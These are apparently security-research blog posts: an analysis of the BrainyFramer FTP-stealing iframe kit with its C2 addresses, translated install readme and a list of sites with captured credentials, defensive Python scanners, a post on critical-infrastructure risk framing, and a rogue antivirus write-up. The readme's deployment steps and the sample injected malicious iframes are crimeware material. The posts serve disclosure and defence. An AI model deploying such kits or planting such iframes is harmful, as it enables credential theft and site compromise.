A forum administrator vouches for brainy, acting as the trusted middleman or “guarantor”. In translation:

I’ve been using this software for quite a while now. Everything the author claims the software does, it does. The author is an adequate person who is pleasant to deal with. Updates are released regularly. Overall, I recommend.
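The “framer” function in the ad is the part a site owner actually sees: pages on a server whose FTP credentials were stolen get a hidden iframe pointing at an attacker-controlled host. As an added example (not code from the post or from the kit), here is a small scanner that flags hidden iframes in fetched page content and notes whether they point off-site. The page, host names and size thresholds are constructed for illustration:

```python
import re
from urllib.parse import urlparse

# Host of the site being checked (assumed for the example).
SITE_HOST = "www.example-shop.com"

# Constructed page: one legitimate same-site iframe, one visible third-party
# embed, and two injected iframes of the kind an "iframer" bot plants.
SAMPLE_PAGE = """<html><body>
<h1>Welcome</h1>
<iframe src="https://www.example-shop.com/promo" width="300" height="200"></iframe>
<iframe src="http://hzone.example.net/in.php" width="0" height="0" style="visibility:hidden"></iframe>
<p>Footer</p><iframe src='http://203.0.113.9/ld/load.php' width=1 height=1 frameborder=0></iframe>
<iframe src="https://video.example.org/embed/xyz" width="560" height="315"></iframe>
</body></html>"""

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE | re.DOTALL)
ATTR_RE = re.compile(r"""([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")


def _attrs(raw):
    """Parse the attribute string of one tag into a lowercase-keyed dict."""
    return {m.group(1).lower(): (m.group(2) or m.group(3) or m.group(4) or "")
            for m in ATTR_RE.finditer(raw)}


def _pixels(value):
    """Leading integer of a width/height attribute, or None if absent/non-numeric."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None


def find_hidden_iframes(html, site_host=SITE_HOST):
    """Return the iframes that are hidden by size or CSS.

    Each finding records the src, why it counts as hidden, and whether the
    src points off-site. Visible third-party embeds are not reported:
    hiding, not origin, is what separates an injection from a widget.
    """
    findings = []
    for m in IFRAME_RE.finditer(html):
        a = _attrs(m.group(1))
        reasons = []
        w, h = _pixels(a.get("width")), _pixels(a.get("height"))
        if (w is not None and w <= 1) or (h is not None and h <= 1):
            reasons.append("zero-or-pixel size")
        style = a.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("css-hidden")
        if not reasons:
            continue
        src = a.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        findings.append({
            "src": src,
            "reasons": reasons,
            "off_site": bool(host) and host != site_host.lower(),
        })
    return findings


if __name__ == "__main__":
    for f in find_hidden_iframes(SAMPLE_PAGE):
        flag = "OFF-SITE" if f["off_site"] else "same-site"
        print(f"{flag:9} {f['src']}  ({', '.join(f['reasons'])})")
```

Run this over files pulled from the web root (or over a diff against a known-good copy) rather than over what a browser renders, since the injection lives in the files the FTP account can write. It is a first pass only: injections are often obfuscated JavaScript that builds the iframe at runtime, which this plain-markup check will not see.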

On a server hosting some other nasty stuff including the Liberty exploit kit I found Brainy’s kit:

IP: 210.51.166.220

Domains:

bale.ws
ciao.ws
prefix.ws
hzone666.cn

Here is the readme file that comes with the bot (translated from the Russian):

Scripts for [BrainyFramer]

0. conf.php – database settings and working links
1. create.php – creates the table
3. get.php – gives the bot its settings
4. check.php – admin panel
5. list.txt – list of FTPs
6. \logs\ftp.log – log from FTP (permissions 755)
7. \logs\https.log – log from HTTPS (permissions 755)
8. grab.dll – grabber module, do not touch!

How to install these scripts?
——————————–
- Configure the folder so that search bots don’t crawl our files
- Create a database for them, enter the database settings, and also set the login and password for the admin panel.
- Run create.php; if everything is OK with the settings you will see “Tables created”
- Upload the list of FTP accounts (the list must be in plain text format) to the server, into the folder with the scripts; write the file name of the list (list.txt by default) into conf.php
——————————–

(c) Brainy 352668917


Today the list.txt (which contains compromised FTP accounts) has 528 entries. This list has varied over time, at one point swelling to 100,000 entries, although many were duplicates. Also, many accounts were taken from public postings of compromised FTP accounts. (Nov 1: 23,632 entries in list.txt; Nov 15: 100,000 entries.)

The ftp.log file, which holds the FTP credentials that this instance of the BrainyFramer kit has captured, contains 1684 entries. Many are local accounts, anonymous accounts and so on. The 528 entries in list.txt appear to be a cleaned up version of the entries in ftp.log.

The most interesting file is https.log, which contains credentials captured from HTTPS sessions. This file is 2.8 MB and contains credentials captured from 2059 unique IP addresses.


Credentials were captured for users with accounts on 125 sites:

ac-s8.mcafee-sms.com
adklik-adpartner.mynet.com
app.expressemailmarketing.com
applin0.hostedsitebuilder.com
apps.rackspace.com
appserver.5paisa.com
auth.mail.ru
billing.hostley.net
billing.justhost.com
bne003wm.server-secure.com
bolton.eukhost.com
cart.godaddy.com
club.panasonic.jp
dc-au.server-secure.com
domains.live.com
ea.onlineregister.com
echosting.cafe24.com
email.1and1.com
email.secureserver.net
email05.secureserver.net
firstfreedom.securepagehost.com
gator340.hostgator.com
gen.gmarket.co.kr
host1.medcohealth.com
host136.aessuccess.org
hotsms.www.hi.nl
htdatabase.fluidhosting.com
idp.godaddy.com
in.adserver.yahoo.com
intranic.nic.in
irenerobles.readyhosting.com
login.1und1.de
login.bluehost.com
login.hosted-commerce.net
login.mcafee-sms.com
mail.bsf.nic.in
mail.nextpharma.com.tr
mail.nic.in
mailhost.hrhgeology.com
mailserver2.security-forces.com
market.egitimonline.com
market.mynet.com
market.sealonline.co.kr
netac80.vie.hosting.nokia.com
onlinedoctor.lloydspharmacy.com
p2.secure.hostingprod.com
partner.allianz.hu
passport.yandex.ru
portal.bsh-partner.com
rbserver.achievacu.com
rdserver.rd.go.th
register.btinternet.com
register.dailymail.co.uk
register.facebook.com
register.go.com
register.hp.com
register.metro.co.uk
register.outspark.com
register.perfectworld.com
register.remedylife.com
register.scansoft.com
registration.lycos.com
rni.nic.in
secure.domain.com
secure.hostelbookers.com
secure.odlmarkets.com
secure.server101.com
secure.turhost.com
secure.turkishost.com
secure01.bankhost.com
server.iad.liveperson.net
server.lon.liveperson.net
server.ylos.com
server10.dollarsonthenet.net
server11.dollarsonthenet.net
server12.dollarsonthenet.net
server7.dollarsonthenet.net
server8.dollarsonthenet.net
server9.dollarsonthenet.net
serverfarm.pubblica.istruzione.it
sitemail.hostway.com
smsforlife.matssoft.co.uk
sponsorlusms.turkcell.com.tr
sprint.ehosts.net
srv25.trwww.com
suze.ucs.louisiana.edu
webhosting.icicibank.com
webmail-au.server-secure.com
webmail.makromarket.net
webmail.ruc.dk
webmailcluster.perfora.net
webserver.afyon.bel.tr
webserver.zeytinburnu.bel.tr
websms.djezzy.com
www.adbrite.com
www.bostonmarketjobs.com
www.cart32hostingred.com
www.domaindiscount24.net
www.foundationapi.com
www.garantiserver.com
www.gmarket.co.kr
www.gmarket.com.sg
www.godaddy.com
www.handelsregister.de
www.hc.ru
www.host.net.tr
www.hostelsclub.com
www.jetsms.net
www.kaynaksms.com
www.limitsizhosting.com
www.lloydspharmacy.com
www.members.hostiga.com
www.nic.lv
www.nic.ru
www.nic.tr
www.register.bilgi.edu.tr
www.smsodyssey-a01.com
www.speakerrepair.com
www.teknoserver.net
www.topmarketer.net
www.voshost.com
www.webmarket.com.tr
www.webmarketplace.de
www.websms.com.tr
www1.soriana.com
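The figures above (528 cleaned FTP accounts out of 1684 logged, 2059 victim IPs, 125 sites) are what you get by triaging the kit’s drop files. As an added example, not code from the post or from the kit, here is a script that does that cleanup and summary. The kit’s log formats are not documented on this page, so the pipe-separated layouts and the sample lines below are constructed for illustration:

```python
import ipaddress
from collections import Counter

# Constructed sample of an ftp.log: one credential per line, host|user|password.
FTP_LOG = """\
ftp.example-hosting.net|webmaster|Sup3rS3cret
ftp.example-hosting.net|webmaster|Sup3rS3cret
127.0.0.1|root|toor
192.168.1.10|admin|admin
ftp.mirror.example.org|anonymous|guest@
ftp.shop.example.co.uk|upload|Pa55w0rd
ftp.example-hosting.net|WEBMASTER|Sup3rS3cret
garbage line without separators
"""

# Constructed sample of an https.log: victim_ip|target_host|user|password.
HTTPS_LOG = """\
203.0.113.7|login.example-host.com|alice|hunter2
203.0.113.7|secure.example-bank.com|alice|hunter2
198.51.100.23|login.example-host.com|bob|qwerty
198.51.100.23|register.example-social.com|bob|qwerty
203.0.113.250|www.example-registrar.com|carol|letmein
"""

ANONYMOUS_USERS = {"anonymous", "ftp", "guest"}


def _is_local(host):
    """True for loopback, private and link-local addresses, and for bare
    hostnames without a dot: none of these are reachable by the attacker
    from the Internet, so they only add noise to the list."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "." not in host
    return ip.is_loopback or ip.is_private or ip.is_link_local


def clean_ftp_list(text):
    """Reproduce the 'cleaned up' list.txt from a raw ftp.log: drop
    malformed, local and anonymous entries and duplicates (host and user
    compared case-insensitively). Returns (host, user, password) tuples in
    first-seen order."""
    seen, kept = set(), []
    for line in text.splitlines():
        parts = [p.strip() for p in line.split("|")]
        if len(parts) != 3 or not all(parts[:2]):
            continue
        host, user, password = parts
        if user.lower() in ANONYMOUS_USERS or _is_local(host):
            continue
        key = (host.lower(), user.lower(), password)
        if key in seen:
            continue
        seen.add(key)
        kept.append((host, user, password))
    return kept


def summarize_https_log(text):
    """Count distinct victim IPs and distinct target sites, plus entries per
    site, which is what the notification list is built from."""
    victims, per_site = set(), Counter()
    for line in text.splitlines():
        parts = [p.strip() for p in line.split("|")]
        if len(parts) != 4:
            continue
        victim_ip, target_host = parts[0], parts[1].lower()
        victims.add(victim_ip)
        per_site[target_host] += 1
    return {
        "unique_ips": len(victims),
        "unique_sites": len(per_site),
        "per_site": dict(per_site),
    }


if __name__ == "__main__":
    kept = clean_ftp_list(FTP_LOG)
    print(f"{len(kept)} usable FTP accounts after cleanup")
    summary = summarize_https_log(HTTPS_LOG)
    print(f"{summary['unique_ips']} victim IPs, {summary['unique_sites']} sites:")
    for site, n in sorted(summary["per_site"].items()):
        print(f"  {site}: {n}")
```

Treat every line of such a drop as a live credential: the cleaned output exists to notify the providers and registrars that own the target hosts (through abuse contacts or a national CERT, as happened here), and it should be stored and shared with the same care you would want applied to your own passwords.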

The .ws registrar has suspended the domain names, the Chinese CERT appears to have taken action against the command and control server residing in their IP space, and AusCERT has been a great help with notification. (And thanks to Jose Nazario too).

Thoughts on Critical Infrastructure Protection



In a very interesting paper for the International Risk Governance Council, Ortwin Renn describes a framework that provides an “analytic structure for investigating and supporting the treatment of risk issues.” Renn argues that risks are “mental ‘constructions’” in which actors link signals from the real world with “experience of actual harm” along with “the belief that human action can prevent harm in advance.” Therefore, how actors come to understand threats and risks is critical for it affects risk governance. Renn defines “risk governance” as follows:

On a national scale, governance describes structures and processes for collective decision-making involving governmental and non-governmental actors (Nye and Donahue 2000). Governing choices in modern societies is seen as an interplay between governmental institutions, economic forces and civil society actors (such as NGOs). At the global level, governance embodies a horizontally organised structure of functional self-regulation encompassing state and non-state actors bringing about collectively binding decisions without superior authority (cf. Rosenau 1992; Wolf 2002).

Renn suggests that there are four phases of risk governance: pre-assessment, appraisal, tolerability and acceptability judgement, and management. My interest at this point is in the pre-assessment phase. How do we come to understand the nature of cyber threats to critical infrastructure (CI) and how do we assess the risks they pose? Framing is a critical component of the pre-assessment phase, for it determines what information is relevant and how risk is perceived. It shapes how we come to understand threat, and indicates a direction of action.

Framing

Cyber threats, and in particular cyber threats relating to CI, have been largely framed in polar opposite extremes.

On one end of the continuum we have those who believe cyber threats to be nothing more than a nuisance. It is not uncommon to hear “our systems are well protected”, followed by “everyone gets a virus every now and then” and finally “well, our critical systems are firewalled, air-gapped, not connected to the Internet.” In this case threats are treated as “standalone” cases that are largely technical in nature.

From such a perspective, technical considerations take precedence over who might be behind the attacks, what the attackers’ motivations are, and what the consequences of cyber intrusions are: for example, what could the attackers have done with the level of access obtained, the documents stolen, or the contacts harvested? This results in underestimated risk, de-prioritization, and sometimes even inaction.

On the other side you’ll hear that China/Russia/Hackers – whatever the flavour of the day is – have thoroughly infiltrated CI and can “shut down the electrical grid” or “crash airplanes into one another” or … insert catastrophe here.

From this perspective, political persuasions concerning attribution are prioritized over technical considerations. The scenarios used to illustrate the threat are often ill-conceived and do not reflect the technical and operational environments they are meant to address. Rather than focus on “boring” details, this perspective seeks to lay blame on external sources. This results in overestimated risk, sometimes producing disbelief and therefore inaction, or, when it does spur action, a focus on the wrong threats.

For example, some often quote the case of the Australian sewage hacker. An attacker managed to compromise a waste management system near Brisbane, Australia and intentionally caused millions of litres of raw sewage to spill out over the suburb of Sunshine Coast. Many, including the WSJ, suggest, “what if hackers located in China or Russia were able to conduct attacks like this here?”

Well, it turns out that the “hacker” in this case was an insider: he had been “employed by the company that had installed the system” that he later “hacked”, and he had specialized knowledge of the system. Moreover, the attack did not occur over the Internet; the attacker issued commands over radio and had to be within a 25 mile radius, something that doesn’t apply to hackers operating out of China or Russia. Security solutions focusing solely on external threats would not have protected this installation.

Re-framing the problem reveals a much more complex threat landscape. CI faces “integrated threats” which encompass the intersection of cyberspace and “meatspace”. The “cyber” threat is not purely digital. Nor is the threat limited to only emergencies or catastrophic events.

CI encompasses the private and public sectors and is increasingly reliant on Internet connectivity (in some capacity). Government relies on networks operated by private firms, which contract with other private firms and so on. “Ownership” of the cyber security process is distributed across all the entities responsible for the setup and installation of these systems, through to operations and maintenance.

In addition, individual operations are reliant on others, something that the Northeast Blackout of 2003 demonstrated so vividly. The operations of Canadian CI were negatively impacted by the operations of another, in this case foreign, operator.

This same lesson applies to cyberspace.

Therefore defence needs to be conceptualized not just in terms of firewalls and IDS but also the security of the operations at each stage (computer security, software security, the tools used during installation, remote access for maintenance, and connection from “trusted” operators) as well as the “insider” threat.

The good thing is that this re-framing is occurring. There are now a variety of public documents that serve as an early warning of the potential threat CI faces – I’ll briefly discuss two of them:

1. A report by the Department of Transportation’s Inspector General that documents a variety of attacks against and vulnerabilities in the FAA’s air traffic control system (May 2009)

2. A report commissioned by the Department of Energy investigating common cyber security vulnerabilities in control systems (November 2008)

Early Warning

The DOT Inspector General’s report documented successful attacks that have affected FAA networks. In 2006 the FAA shut down a “portion of its ATC systems in Alaska” due to a “viral attack”, and in 2008 FAA computers, again in Alaska, were compromised and 40,000 usernames and passwords were stolen. In 2009 “a FAA public-facing Web application computer” was compromised, leading to the theft of “PII on 48,000 current and former FAA employees.”

Vulnerabilities were found during an audit in various web-applications that would have allowed attackers to access the data stored on those computers – this included public facing systems such as those which list “communications frequencies for pilots and controllers” as well as internal systems used by the FAA:

  • Unauthorized access was gained to information stored on Web application computers associated with the Traffic Flow Management Infrastructure System, Juneau Aviation Weather System, and the Albuquerque Air Traffic Control Tower;
  • Unauthorized access was gained to an ATC system used to monitor critical power supply at six en route centers; and
  • Vulnerability found on Web applications associated with the Traffic Flow Management Infrastructure system was confirmed, which could allow attackers to install malicious codes on FAA users’ computers.

According to the report, “[t]his occurred because (1) Web applications were not adequately configured to prevent unauthorized access and (2) Web application software with known vulnerabilities was not corrected in a timely manner by installing readily available security software patches released to the public by software vendors.”

The report on common cyber security vulnerabilities in control systems for the DOE identified similar issues along with serious issues concerning the use of plain text communications protocols and the lack of security surrounding remote access systems. The report found:

“If compromised, an attacker could utilize these systems to cause catastrophic damage or outages directly or by exploiting paths to critical end devices or connected SCADA systems.”

Typically the network environment is divided into a “business LAN” and a “control system LAN” with a firewall in between. Sometimes, a DMZ, is created to share data between the corporate and control system LANs.

The report found that:

  • Firewall and router filtering deficiencies include access to control system components through external and internal networks (unrestricted telnet access allowed to DMZ network equipment, misconfigured VPNs, and remote desktop passwords that were common between security zones, i.e. the corporate and control system networks).
  • It was possible to escalate privileges from a non-control system application remotely published by the display application to a control system application.
  • A malicious user who has physical access to an unsecured port on a network switch could plug into the network behind the firewall to defeat its incoming filtering protection.

A very interesting theme throughout the report was the focus on remote, trusted endpoints. The report found that the Inter-Control Center Communications Protocol (ICCP), “an open protocol used internationally in the electric power industry to exchange data among utilities, regional transmission operators, independent power producers, and others” uses plain text and that such connections should be treated as “untrustworthy” and placed in a separate DMZ.

In other words, operators within the industry treat remote connections between them as trustworthy, bypassing the security procedures in place. This means that even if your operation is relatively secure, an attacker may be able to bypass it by compromising a less secure peer.
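To make the DOE report’s findings concrete, here is an added example (not from the report or this post) that checks a perimeter ruleset for three of them: plaintext management protocols reaching the DMZ or control zone, remote desktop crossing a zone boundary, and an external ICCP peer terminating inside the control LAN rather than in its own DMZ. The zone addressing, the rule format and the rules themselves are constructed; ICCP is checked on TCP port 102 (ISO-TSAP), the transport it normally rides on.

```python
import ipaddress

# Constructed zone plan for the example.
ZONES = {
    "business": ipaddress.ip_network("10.1.0.0/16"),
    "dmz": ipaddress.ip_network("10.2.0.0/24"),       # corporate <-> control data sharing
    "iccp_dmz": ipaddress.ip_network("10.3.0.0/24"),  # where external ICCP peers terminate
    "control": ipaddress.ip_network("10.9.0.0/16"),
}

# Protocols that carry credentials or commands in the clear.
PLAINTEXT_MGMT = {21: "ftp", 23: "telnet", 80: "http", 161: "snmp"}
RDP_PORT = 3389
ICCP_PORT = 102   # ISO-TSAP (RFC 1006), used by ICCP/TASE.2

# Constructed ruleset: (action, source CIDR, destination CIDR, destination port).
RULES = [
    ("allow", "10.1.0.0/16",    "10.2.0.0/24", 443),   # business -> DMZ historian: fine
    ("allow", "10.1.0.0/16",    "10.2.0.0/24", 23),    # telnet to DMZ switches
    ("allow", "10.1.0.0/16",    "10.9.0.0/16", 3389),  # RDP straight into the control LAN
    ("allow", "203.0.113.0/24", "10.9.0.5/32", 102),   # neighbouring utility's ICCP, into control LAN
    ("allow", "203.0.113.0/24", "10.3.0.5/32", 102),   # same peer, into the ICCP DMZ: correct
    ("allow", "10.3.0.5/32",    "10.9.0.5/32", 102),   # ICCP relay from the DMZ inward
    ("deny",  "0.0.0.0/0",      "10.9.0.0/16", 0),     # default deny
]


def zone_of(cidr):
    """Name of the zone containing the whole CIDR, or 'external'."""
    net = ipaddress.ip_network(cidr)
    for name, zone in ZONES.items():
        if net.version == zone.version and net.subnet_of(zone):
            return name
    return "external"


def audit(rules):
    """Return one finding string per allow rule that matches a weakness."""
    findings = []
    for action, src, dst, dport in rules:
        if action != "allow":
            continue
        sz, dz = zone_of(src), zone_of(dst)
        if dport in PLAINTEXT_MGMT and dz in ("dmz", "control"):
            findings.append(f"{PLAINTEXT_MGMT[dport]} {src} -> {dst}: plaintext management protocol into {dz}")
        if dport == RDP_PORT and sz != dz:
            findings.append(f"rdp {src} -> {dst}: remote desktop crosses zones ({sz} -> {dz})")
        if dport == ICCP_PORT and sz == "external" and dz != "iccp_dmz":
            findings.append(f"iccp {src} -> {dst}: external peer terminates in {dz}, not in the ICCP DMZ")
    return findings


if __name__ == "__main__":
    for line in audit(RULES):
        print(line)
```

The RDP check is deliberately strict: the report’s actual finding was that remote desktop passwords were shared between zones, which no ruleset can see, so the conservative stance is to refuse RDP across the boundary and force a jump host in the DMZ. The unsecured switch port finding is likewise invisible to a firewall audit; it needs port security or 802.1X on the switches themselves.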

Determining risk in cyberspace is difficult. Attacks occur everyday.

Attackers may be highly skilled and well resourced adversaries or simply opportunistic amateurs. Some are professional cyber criminals, others are motivated by politics or status within their community. Still others may be engaged in espionage or data theft and have ties to state governments. Attacks may be largely symbolic, intended to intimidate, or they may aim to cause disruption or destruction.

An attack that may seem insignificant may have much larger consequences.

Knowing the degree of risk posed by attackers — ascertaining the “who” and “why” — is critical for mounting an effective response. To be clear, understanding why an attack occurred should not be used as an excuse such as “why would anyone attack poor old me” to limit or restrict corrective measures. Rather, it is used to situate the attack in a broader perspective which may indicate why the target was chosen and what the attacks may aim to do with the information/data they have extracted.

Understanding a single attack is only one component of establishing a complete threat picture.

In order to develop a better understanding of the rapidly changing risks and threats in cyberspace, ongoing monitoring and analysis is required. Rather than a static assessment, or a singular incident response, such threat mapping is better conceptualized as an iterative interrogation process in which old and new data are examined for meaningful relationships and new evidence.

Cyber threats to CI exist, don’t get me wrong, but the emphasis need not be on an unlikely catastrophic event like a “cyber-Katrina”, a “cyber-911” or a “digital Pearl Harbor.” There are numerous vulnerabilities to be exploited, and they probably are being exploited.

The good news is that they are often remedied through the implementation of best security practices. The bad news is that “boring” security concerns do not capture the imagination of policy makers and bureaucrats responsible for committing resources to fix security issues.

Still, this is not an excuse to conjure up fiction, even if the goal is to spur corrective action in the right direction.

We need to find the right framing that captures the attention of policy makers but that accurately reflects the threats and vulnerabilities to CI.

We need to change the perception of security as something that’s brought in to “fix” an emergency or as a response to catastrophe. It needs to be part of the development, implementation, and operation of CI. Considering the sorry state of affairs, I do think that scenarios can be useful tools to help policy makers understand the nature of the threat. However, they need to be realistic; they need to reflect the operational environment of CI. If they are just hype they are in the best case useless and in the worst case an actual detriment.

Rogue AV: IAV Pro




Internet AntiVirus Pro is rogue anti-virus software that uses fake scans and threats to entice users into downloading and purchasing the software. Moreover, IAV uses intermediary sites that force users to download the software. There is no easy way to uninstall it, and IAV demands that people pay to receive software that can uninstall the software they never wanted in the first place. (For more about these guys read Dancho Danchev’s blog.)

The “Support” form on IAV web sites stores submissions from users in a web accessible directory.


The 1200+ submissions found on one server mostly focused on the inability to remove the software and the fact that users either installed it by mistake or had no idea how the software was installed.

Some are polite…

Subject: Removal
Content: Please remove this file from my system. I had run this by mistake. I already have my own antivirus. Thanks!
Country:CA

Some are not so polite…

Subject: fuck this shit
Content: get this shit off my computer, now!!!!
Country:US

Overall, people are extremely frustrated and unsure of what to do. Some seem to believe that this is a real anti virus product — some even ask if they are related to other real anti virus products. Many also indicate that they already have AV products installed.

Others recognise that it is a scam but are unable to do anything about it. Many state that it was their children that installed the software thinking they were doing their parents a favour. They also describe how it is interfering with their businesses, education and general computer usage.

What outrages people the most seems to be the fact that the rogue AV demands that you buy the software if you want to be able to uninstall it.

It is a good reminder that this stuff affects real peoples lives in a very unpleasant way.

Downtime



Sorry about the downtime :)